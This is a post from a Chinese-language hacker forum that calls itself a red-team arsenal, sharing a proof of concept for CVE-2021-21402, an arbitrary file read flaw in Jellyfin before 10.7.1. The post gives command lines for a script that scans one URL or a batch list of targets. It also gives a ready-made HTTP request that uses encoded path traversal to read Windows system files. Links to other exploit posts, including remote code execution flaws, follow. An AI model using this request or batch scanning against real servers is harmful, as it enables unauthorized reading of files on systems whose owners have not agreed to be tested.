黑客仓库

最全面知识的黑客论坛，全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库，您可以在我们的论坛板块进行交流和学习。

立即注册账号！

POC 任意文件读取漏洞（CVE-2021-21402）

主题发起人 Shacker
开始时间 09 13, 2024

Shacker

黑客倉庫站長

贡献: 21%

09 13, 2024

JavaScript:

## 影响范围 

```http
Jellyfin < 10.7.1 
```

## POC

```bash
#单个url测试
python3 CVE-2021-21402.py -u http://127.0.0.1:1111

#批量检测
python3 CVE-2021-21402.py -f url.txt
```

## EXP

```
GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream
```

POC 任意文件读取漏洞（CVE-2021-21402）

POC Jellyfin

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	POC 任意文件读取漏洞（CVE-2021-21402） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC VMware vCenter Server未授权RCE漏洞（CVE-2021-21972） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Django上传文件目录穿越漏洞——CVE-2021-31542 Shacker 09 13, 2024 POC/?Day漏洞数据
	POC CVE-2021-26295 Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109 Shacker 09 13, 2024 POC/?Day漏洞数据

本站需要使用 Cookie。如果您继续使用本站，则表示同意我们使用 Cookie。

接受了解更多。...

后退

顶部

黑客仓库

POC 任意文件读取漏洞（CVE-2021-21402）

论坛统计

新会员

在线会员

关于我们